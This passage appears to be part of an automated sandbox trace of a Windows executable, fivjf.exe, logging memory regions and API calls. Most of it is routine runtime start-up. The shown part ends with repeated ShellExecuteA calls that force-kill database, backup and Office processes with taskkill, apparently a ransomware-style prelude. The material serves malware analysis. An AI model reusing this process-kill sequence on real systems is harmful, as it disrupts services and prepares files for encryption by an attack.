0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14335 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14336 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14337 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14338 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14339 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14340 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14341 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14342 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14343 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14344 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Thread: id = 1 os_tid = 0x958 [0060.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf938 | out: lpSystemTimeAsFileTime=0x1cf938*(dwLowDateTime=0xdb721f70, dwHighDateTime=0x1d48689)) [0060.679] GetCurrentThreadId () returned 0x958 [0060.679] GetCurrentProcessId () returned 0x954 [0060.679] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf940 | out: lpPerformanceCount=0x1cf940*=1810759700000) returned 1 [0060.680] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.680] GetLastError () returned 0x57 [0060.680] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x7fef8f10000 [0060.685] GetProcAddress (hModule=0x7fef8f10000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0060.685] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.685] GetLastError () returned 0x57 [0060.685] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0060.686] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.686] GetLastError () returned 0x57 [0060.686] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x77550000 [0060.686] GetProcAddress (hModule=0x77550000, lpProcName="FlsAlloc") returned 0x77567190 [0060.686] GetProcAddress (hModule=0x77550000, lpProcName="FlsSetValue") returned 0x7756bd90 [0060.686] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.686] GetLastError () returned 0x57 [0060.686] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x7feff740000 [0060.686] GetProcAddress (hModule=0x7feff740000, lpProcName="EventRegister") returned 0x776acac0 [0060.687] EtwEventRegister (in: ProviderId=0x13f103058, EnableCallback=0x13f0e107c, CallbackContext=0x13f103030, RegHandle=0x13f103050 | out: RegHandle=0x13f103050) returned 0x0 [0060.687] GetProcAddress (hModule=0x7feff740000, lpProcName="EventSetInformation") returned 0x0 [0060.688] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.688] GetLastError () returned 0x57 [0060.688] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x7fef8f10000 [0060.688] GetProcAddress (hModule=0x7fef8f10000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0060.688] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.688] GetLastError () returned 0x57 [0060.688] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0060.689] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.689] GetLastError () returned 0x57 [0060.689] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x77550000 [0060.689] GetProcAddress (hModule=0x77550000, lpProcName="FlsAlloc") returned 0x77567190 [0060.689] GetLastError () returned 0x57 [0060.689] GetProcAddress (hModule=0x77550000, lpProcName="FlsGetValue") returned 0x77573520 [0060.689] GetProcAddress (hModule=0x77550000, lpProcName="FlsSetValue") returned 0x7756bd90 [0060.689] SetLastError (dwErrCode=0x57) [0060.694] GetStartupInfoW (in: lpStartupInfo=0x1cf810 | out: lpStartupInfo=0x1cf810*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x1)) [0060.694] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.694] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.694] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" " [0060.694] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" " [0060.694] GetLastError () returned 0x57 [0060.694] SetLastError (dwErrCode=0x57) [0060.694] GetLastError () returned 0x57 [0060.695] SetLastError (dwErrCode=0x57) [0060.695] GetACP () returned 0x4e4 [0060.695] IsValidCodePage (CodePage=0x4e4) returned 1 [0060.695] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf7e0 | out: lpCPInfo=0x1cf7e0) returned 1 [0060.695] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf080 | out: lpCPInfo=0x1cf080) returned 1 [0060.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf0a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf0a0, cbMultiByte=256, lpWideCharStr=0x1cedd0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȰ!") returned 256 [0060.695] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȰ!", cchSrc=256, lpCharType=0x1cf3a0 | out: lpCharType=0x1cf3a0) returned 1 [0060.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf0a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.696] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf0a0, cbMultiByte=256, lpWideCharStr=0x1ced70, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0060.696] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0060.696] GetLastError () returned 0x57 [0060.696] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0060.696] GetProcAddress (hModule=0x77550000, lpProcName="LCMapStringEx") returned 0x7759b710 [0060.697] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0060.697] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x1ceb60, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0060.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x1cf1a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp³\"", lpUsedDefaultChar=0x0) returned 256 [0060.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf0a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.697] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf0a0, cbMultiByte=256, lpWideCharStr=0x1ced70, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0060.697] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0060.697] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x1ceb60, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0060.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x1cf2a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0060.698] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x13f10a380, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe")) returned 0x2f [0060.698] RtlInitializeSListHead (in: ListHead=0x13f10a190 | out: ListHead=0x13f10a190) [0060.698] GetLastError () returned 0x0 [0060.698] SetLastError (dwErrCode=0x0) [0060.698] GetEnvironmentStringsW () returned 0x22ecd0* [0060.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1342, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1342 [0060.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1342, lpMultiByteStr=0x22f760, cbMultiByte=1342, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1342 [0060.699] FreeEnvironmentStringsW (penv=0x22ecd0) returned 1 [0060.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13f0e8c60) returned 0x0 [0060.700] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf6f0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe")) returned 0x2f [0060.700] GetStartupInfoW (in: lpStartupInfo=0x1cf8a0 | out: lpStartupInfo=0x1cf8a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.722] Sleep (dwMilliseconds=0x1388) [0065.722] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" " [0065.722] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" ", pNumArgs=0x10e098 | out: pNumArgs=0x10e098) returned 0x22f950*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" [0065.722] DeleteFileW (lpFileName=0x0) returned 0 [0065.722] LocalFree (hMem=0x22f950) returned 0x0 [0065.724] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM zoolz.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0068.650] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM agntsvc.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0068.848] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM dbeng50.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0068.910] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM dbsnmp.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0069.015] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM encsvc.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0069.075] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM excel.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0069.449] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM firefoxconfig.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0069.539] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM infopath.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0070.058] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM isqlplussvc.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0070.117] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM msaccess.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0071.096] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM msftesql.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0071.202] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mspub.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0071.492] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mydesktopqos.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0071.869] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mydesktopservice.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0072.159] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mysqld.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0072.304] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mysqld-nt.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0072.666] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mysqld-opt.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0072.719] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM ocautoupds.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0072.851] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM ocomm.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0073.005] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM ocssd.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0073.417] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM onenote.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0073.492] ShellExecuteA 